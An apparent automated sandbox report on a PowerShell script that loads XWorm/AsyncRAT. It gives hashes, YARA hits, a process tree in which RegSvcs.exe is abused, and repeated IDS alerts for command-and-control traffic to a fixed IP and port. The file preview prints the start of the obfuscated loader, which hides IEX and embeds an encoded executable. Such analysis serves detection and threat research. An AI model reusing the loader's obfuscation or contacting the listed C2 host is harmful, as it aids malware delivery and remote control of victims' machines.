                                    Preview:...................................FL..................F.".. ....'GDj...p6...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj.......Q......Q......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.9..........................=...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EWsG.Y.9...........................V*.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.9..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.9..........................X=..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.9....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.9....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.9................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6220
                                    Entropy (8bit):3.7295667045435508
                                    Encrypted:false
                                    SSDEEP:96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI
                                    MD5:D98DB6FE96E16D81FE7D7F548BBE009C
                                    SHA1:39902225B1C203A864E4271EFF48705852566477
                                    SHA-256:3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD
                                    SHA-512:1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ....'GDj...p6...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj.......Q......Q......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.9..........................=...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EWsG.Y.9...........................V*.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.9..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.9..........................X=..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.9....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.9....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.9................
                                    File type:ASCII text, with very long lines (65459), with CRLF line terminators
                                    Entropy (8bit):5.195931400416405
                                    TrID:
                                      File name:mhqxUdpe7V.ps1
                                      File size:143'864 bytes
                                      MD5:d8e887ed6c14e9b9279b739aea8bb613
                                      SHA1:d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071
                                      SHA256:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e
                                      SHA512:eb5c96ba7b726fca6edced657baf55b34157f6576f4a340a671ebe0705b06742ea281bdc2230c08aa9f8bd8b687dee6bbb2070eb16b1cdf467041301334a3f0f
                                      SSDEEP:3072:VDY+KK5sCTIO5MTe4ydXHLM8DIVI96igQycLQxvBzAqx9aKVo6sQ4aR6s:VDY+xiYIO5MTe4ydXHLM8DIVI96igQr4
                                      TLSH:C2E36C330202FD8F6B7F2F84E5043E951C68247B8B599558FACA0AA925B6520DF39DF4
                                      File Content Preview:ipconfig /flushdns...... $t0='AZAZAZIEX'.replace('AZAZAZ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQA
                                      Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T08:15:43.947086+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:44.383553+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:15:44.423184+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:55.993778+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:15:55.995603+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:58.442744+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:15:58.442744+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:07.619210+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:07.622697+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:19.244265+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:19.246948+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.596948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:30.869806+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:30.871894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:35.540659+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:35.586657+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:35.775609+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:35.777466+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:35.966382+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:35.971330+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:37.275818+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:37.278095+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:47.024809+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:47.027279+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:51.681721+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:51.687517+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:51.872600+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:51.874949+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:55.860763+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:16:55.863013+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:58.870117+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:02.360638+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:02.363894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:07.338323+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:07.430548+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:07.529526+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:07.550481+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:07.798850+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:07.804066+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:19.369699+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:19.371972+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:28.636169+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:28.826358+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:28.828701+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:30.009802+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:30.200715+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:30.202778+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:30.366726+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:30.371295+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:30.392547+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:30.491088+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:30.683445+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:30.778035+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:38.088186+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:38.091676+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:41.526413+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:41.528389+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:45.623108+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:45.634389+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:57.260857+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:17:57.263162+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:58.430043+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:08.930832+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:08.932951+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:12.401150+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:12.403176+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:12.591925+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:12.594444+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:12.713869+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:12.715630+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:15.259849+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:15.262040+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:18.994275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:18.999823+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:22.639364+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:23.072270+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:23.074203+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:28.444810+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:34.833814+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:34.838093+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:36.479150+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:36.481824+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:37.871432+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:37.874173+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:45.510717+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:45.514127+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:18:57.135572+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
2024-12-18T08:18:57.141141+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
                                      2024-12-18T08:18:58.456985+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:08.793859+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:08.800193+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:17.112172+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:17.253400+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:21.167141+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:21.168994+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:28.446368+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:30.432749+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:30.433858+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP

Target ID: 0
Start time: 02:15:21
Start date: 18/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1"
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: true

                                      Target ID:1
                                      Start time:02:15:21
                                      Start date:18/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:15:24
                                      Start date:18/12/2024
                                      Path:C:\Windows\System32\ipconfig.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                      Imagebase:0x7ff718340000
                                      File size:35'840 bytes
                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:15:24
                                      Start date:18/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                      Imagebase:0xd50000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512890714.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887b20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: bJ$ bJ
                                        • API String ID: 0-259344987
                                        • Opcode ID: ab3647bf1a015e02f13123bb33d117738af889b09cb502340bbae8a0f2dd7cca
                                        • Instruction ID: ced45464764e9c2aa93f2ac3af7af44ce5618c48bf6ae762b36f24e37910cdb4
                                        • Opcode Fuzzy Hash: ab3647bf1a015e02f13123bb33d117738af889b09cb502340bbae8a0f2dd7cca
                                        • Instruction Fuzzy Hash: 34122532E5EA8D4FE796DA2C58556B93BE2FF96350B4801FAD04DC7193ED18AC06C381
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512890714.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887b20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: bJ
                                        • API String ID: 0-3573994042
                                        • Opcode ID: 804cba145f9657cdbb17da5aff5ee71cca96896a2385efa0ec0a56c45b9539a3
                                        • Instruction ID: 22bb0167399b08533e81ec6a1f1976300ba4556b6b0f1c6d643e3a8b64e1d8c7
                                        • Opcode Fuzzy Hash: 804cba145f9657cdbb17da5aff5ee71cca96896a2385efa0ec0a56c45b9539a3
                                        • Instruction Fuzzy Hash: D461F331A5EACE4FE7969B6C54642B87BF2FF56390B9801FAD04DCB193E9189C05C341
                                        Memory Dump Source
